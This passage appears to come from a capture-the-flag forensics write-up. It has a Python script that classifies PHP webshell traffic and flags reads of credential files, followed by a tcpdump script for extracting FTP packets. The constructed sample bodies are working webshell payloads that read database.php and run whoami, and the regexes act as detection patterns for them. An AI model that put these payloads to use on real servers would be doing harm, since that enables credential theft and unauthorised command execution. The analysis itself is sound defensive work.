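files that hold credentials. Sample bodies below are constructed for this example.
"""
import re
from typing import Dict, List, Optional

# Every payload on the page silences errors first and frames its output between
# two echo("X@Y") calls; treat both as required markers of the webshell protocol.
PREFIX = re.compile(r'@ini_set\("display_errors","0"\);@set_time_limit\(0\);')
DELIM = re.compile(r'echo\("X@Y"\)')

# One pattern per primitive, each capturing the attacker-supplied argument.
READ_FILE = re.compile(r"""\$F=['"]([^'"]+)['"];\$(?:P|fp)=@fopen\(\$F,'r'\)""")
LIST_DIR = re.compile(r"\$D='([^']+)';\$F=@opendir\(\$D\)")
EXEC = re.compile(r"\$s='cd ([^;]+);(.*?);echo \[S\];pwd;echo \[E\]'")

# Files whose disclosure hands over secrets (DB password and auth_key on this page).
SENSITIVE = ("caches/configs/database.php", "caches/configs/system.php")


def classify(body: str) -> Optional[Dict[str, str]]:
    """Map one POST body to {action, target[, cwd]}; None if it is not a webshell command."""
    if not (PREFIX.search(body) and DELIM.search(body)):
        return None
    if m := READ_FILE.search(body):
        return {"action": "read_file", "target": m.group(1)}
    if m := LIST_DIR.search(body):
        return {"action": "list_dir", "target": m.group(1)}
    if m := EXEC.search(body):
        return {"action": "exec", "target": m.group(2), "cwd": m.group(1)}
    return {"action": "unknown", "target": ""}


def triage(bodies: List[str]) -> List[str]:
    """Produce one annotation line per webshell command, flagging credential reads."""
    lines = []
    for body in bodies:
        c = classify(body)
        if c is None:
            continue  # ordinary application traffic
        if c["action"] == "read_file":
            flag = " [CREDENTIALS]" if c["target"].endswith(SENSITIVE) else ""
            lines.append(f"read file {c['target']}{flag}")
        elif c["action"] == "list_dir":
            lines.append(f"list directory {c['target']}")
        elif c["action"] == "exec":
            lines.append(f"run command {c['target']} (cwd {c['cwd']})")
        else:
            lines.append("webshell command of unknown type")
    return lines


# Constructed sample bodies modelled on the capture; the last one is a normal form post.
SAMPLE_BODIES = [
    '@ini_set("display_errors","0");@set_time_limit(0);echo("X@Y");'
    "$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));"
    '@fclose($P);;echo("X@Y");die();',
    '@ini_set("display_errors","0");@set_time_limit(0);echo("X@Y");'
    "$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo(\"ERROR\");}"
    'echo("X@Y");die();',
    '@ini_set("display_errors","0");@set_time_limit(0);echo("X@Y");'
    '$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,\'r\');'
    'if(@fgetc($fp)){@fclose($fp);@readfile($F);}echo("X@Y");die();',
    '@ini_set("display_errors","0");@set_time_limit(0);echo("X@Y");'
    "$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';"
    'echo("X@Y");die();',
    "op=creatjson&content=hello",
]

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_BODIES)))
```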

At this point the HTTP-level part of the challenge should be mostly analysed; once the actual questions are available, the answers can be filled in directly.
This challenge also provides an FTP log,
so it presumably involves the FTP protocol as well.

#!/bin/bash
#ftp.sh
# Extract the packets involving either FTP host of interest from every pcap in the current directory

target_folder='ftp'

mkdir -p "${target_folder}"

# Glob directly instead of parsing ls output; quote the file names
for file in *.pcap;
do
   echo "Dumping ftp package in ${file}..."
   # -w writes raw packets, so no -A (ASCII printing) is needed here
   tcpdump -s 0 'host 192.168.20.117 or host 192.168.20.248' -r "${file}" -w "${target_folder}/${file}"
   echo "${file} Done!"
done

There are FTP packets, but the IPs from the log do not seem to appear in them.
Perhaps my copy of the packet captures is incomplete?
